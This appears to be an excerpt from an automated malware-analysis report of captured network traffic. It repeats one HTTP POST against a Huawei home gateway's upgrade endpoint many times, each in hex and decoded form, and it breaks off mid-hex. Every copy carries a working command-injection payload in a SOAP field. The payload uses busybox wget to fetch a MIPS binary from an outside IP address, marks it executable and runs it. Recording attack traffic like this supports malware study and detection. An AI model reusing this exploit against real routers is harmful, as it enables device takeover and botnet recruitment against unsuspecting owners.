3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 